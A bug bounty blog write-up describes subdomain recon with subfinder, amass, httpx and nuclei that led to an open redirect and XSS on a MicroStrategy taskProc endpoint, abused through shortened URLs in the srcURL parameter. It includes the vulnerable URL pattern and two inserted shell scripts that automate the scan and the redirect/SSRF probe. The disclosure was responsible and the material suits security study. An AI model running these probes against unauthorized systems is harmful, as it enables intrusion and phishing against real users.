How recon helped me find an interesting bug…

Vedant Tekale
3 min read · Aug 15, 2020

Hello infosec community! I’m back again to share an interesting finding with you. A little about me: my name is Vedant and I have been a bug bounty hunter/ethical hacker for about 4 months now, and I love what I do. Back in July I decided that in August I would focus solely on recon; I had always wanted to up my recon game. On 1st August I rented a VPS and installed the tools I needed for subdomain enumeration, content discovery, parameter discovery and so on.

Enough of the backstory, let’s understand the bug.


Recon phase:

One day I was looking for responsible disclosure programs and found one with *.target.com in scope, so I decided to do some recon on it. First I enumerated subdomains with subfinder and amass and combined the output of both tools. Then I ran httpx over the combined list to find which hosts actually respond over HTTP(S) and saved the live ones to a text file. Finally I fed that file to nuclei, another tool from the projectdiscovery team, with the following command:

cat final.txt | nuclei -t path/to/nuclei-templates/vulnerabilities -o results.txt
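The recon phase above as one rerunnable script, added here as an example (it is not the author’s own script). It assumes the apex domain is passed as the first argument, that NUCLEI_TEMPLATES points at a checkout of nuclei-templates (defaulting to ~/nuclei-templates), and that subfinder, amass, httpx and nuclei are on PATH; the merge step is the part the write-up glosses over, so it normalises and de-duplicates the two tools’ output and drops look-alike names that are not actually under the apex.

```shell
#!/bin/sh
# Added example, not the author's script: subfinder + amass merged, httpx probe,
# nuclei scan. Assumed: $1 is the apex domain, NUCLEI_TEMPLATES is a checkout of
# nuclei-templates, and all four tools are on PATH.
set -eu

# Merge raw subdomain output from several tools into one clean list:
# lowercase, drop "*." wildcard prefixes and trailing dots, keep only names
# that are the apex itself or end in ".apex" (so notarget.com is dropped when
# the apex is target.com), then sort and de-duplicate.
merge_subdomains() {
    apex=$1; shift
    cat "$@" \
      | tr 'A-Z' 'a-z' \
      | sed -e 's/^\*\.//' -e 's/\.$//' \
      | awk -v apex="$apex" '
            { n = length($0); m = length(apex) }
            $0 == apex || (n > m && substr($0, n - m) == "." apex)' \
      | sort -u
}

# Full pipeline: enumerate, merge, probe for live HTTP(S) hosts, scan.
run_recon() {
    apex=$1; out=${2:-recon-$apex}
    templates=${NUCLEI_TEMPLATES:-$HOME/nuclei-templates}
    mkdir -p "$out"
    subfinder -d "$apex" -silent -o "$out/subfinder.txt"
    amass enum -passive -d "$apex" -o "$out/amass.txt"
    merge_subdomains "$apex" "$out/subfinder.txt" "$out/amass.txt" > "$out/subdomains.txt"
    # httpx writes only hosts that answered, prefixed with the working scheme
    httpx -l "$out/subdomains.txt" -silent -o "$out/final.txt"
    nuclei -l "$out/final.txt" -t "$templates/vulnerabilities" -o "$out/results.txt"
    wc -l "$out/subdomains.txt" "$out/final.txt" "$out/results.txt"
}

# usage: NUCLEI_TEMPLATES=~/nuclei-templates ./recon.sh target.com [outdir]
if [ $# -ge 1 ]; then
    run_recon "$@"
fi
```

Keeping the intermediate files (subfinder.txt, amass.txt, subdomains.txt, final.txt) lets you rerun only the nuclei step when a new template lands, instead of redoing enumeration every time.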

Discovery phase:

After some time the results came in, and one subdomain was flagged by the MicroStrategy SSRF template. The URL looked like this:

https://something.target.com/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=

At first I tried for an open redirect by setting the srcURL parameter to bing.com, but it didn’t redirect. Then I tried for SSRF, and that didn’t work either. I assumed it was just a false positive.

After some time I googled the word MicroStrategy and learned that it is a company providing cloud-based services. Out of curiosity I then searched for “MicroStrategy vulnerability” and found a Medium post about an SSRF vulnerability that contained exactly the URL I had found. Reading it, I understood that the srcURL parameter only accepts shortened (tiny) URLs, which is why my plain bing.com link was never followed. So I created a tiny URL for https://bing.com, put it in srcURL, and the server redirected me to bing.com.

I tried for SSRF again, but there was none: the site was redirecting my browser to the external URL rather than fetching its content server-side. To increase the impact I looked for a page hosting an XSS payload, created a tiny URL for it, pasted that into srcURL, and the XSS executed successfully. I was very happy.
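The check from the two paragraphs above as a small script, added here as an example and not taken from the write-up or from MicroStrategy. It sends a direct URL and a shortened URL through srcURL with curl, then reads each response the way the text reasons about it: a 30x whose Location points at a host you control is an open redirect; a 200 whose body contains a canary string from your own page means the server fetched it, which would be SSRF; anything else means srcURL did nothing. The taskProc base URL, the two test URLs and the canary string are placeholders the tester supplies; only the query-string shape comes from the write-up.

```shell
#!/bin/sh
# Added example, not the author's script. Assumed inputs: the taskProc base URL
# (without the srcURL value), a direct URL to a page you host that contains the
# canary string, and a shortened URL that resolves to that same page.
set -eu

# Host part of an absolute URL; empty for a relative Location such as "/login".
url_host() {
    h=${1#*://}; [ "$h" = "$1" ] && h=""      # no scheme -> relative URL
    h=${h%%/*}; h=${h%%\?*}; h=${h%%:*}
    printf '%s' "$h"
}

# Interpret one response: status code, Location (curl resolves relative ones),
# the target's own host, and whether the body carried our canary marker.
classify_redirect() {
    code=$1; location=$2; target_host=$3; body_has_marker=${4:-0}
    case "$code" in
        301|302|303|307|308)
            loc_host=$(url_host "$location")
            if [ -z "$loc_host" ] || [ "$loc_host" = "$target_host" ]; then
                echo "same-host-redirect"       # relative/missing Location, or stays on target
            else
                echo "open-redirect:$loc_host"  # the victim's browser lands on our host
            fi ;;
        200)
            if [ "$body_has_marker" = 1 ]; then
                echo "server-side-fetch"        # the server retrieved our page: SSRF
            else
                echo "no-redirect"              # srcURL was ignored or rejected
            fi ;;
        *)  echo "other:$code" ;;
    esac
}

# Send one srcURL value (curl URL-encodes it and appends it to the query
# string) and print the verdict for it.
probe_srcurl() {
    base=$1; src=$2; marker=$3
    target_host=$(url_host "$base")
    body=$(mktemp)
    resp=$(curl -sS -o "$body" -G --data-urlencode "srcURL=$src" \
              -w '%{http_code} %{redirect_url}' "$base")
    code=${resp%% *}; location=${resp#* }
    has_marker=0; grep -q -- "$marker" "$body" && has_marker=1
    rm -f "$body"
    printf '%-50s -> %s\n' "$src" \
        "$(classify_redirect "$code" "$location" "$target_host" "$has_marker")"
}

# usage: ./check_srcurl.sh BASE_URL DIRECT_URL SHORT_URL
#   BASE_URL   e.g. 'https://something.target.com/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml'
#   DIRECT_URL a page you host containing the canary string below
#   SHORT_URL  a shortened link pointing at DIRECT_URL
if [ $# -eq 3 ]; then
    marker="srcurl-canary"   # assumed: the page at DIRECT_URL contains this string
    probe_srcurl "$1" "$2" "$marker"
    probe_srcurl "$1" "$3" "$marker"
fi
```

Pointing both test URLs at a host you control, rather than at bing.com, is what makes the verdict unambiguous: the server log on that host tells you whether the request came from the victim’s browser (open redirect) or from the target’s own IP (SSRF), and the two verdicts above are exactly the distinction the write-up draws.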

I quickly wrote a good report and sent it to the company. After 4–5 days I received a response saying “Thanks for reporting this issue”, and they rewarded me by adding me to their security researchers’ Hall of Fame.

Even though I didn’t get a bounty for this issue, I learned some new things, and most importantly I learned the power of recon.

If you have any doubts regarding this write-up you can reach me here.

Hope you liked this finding. Stay home, stay safe. Thank you!
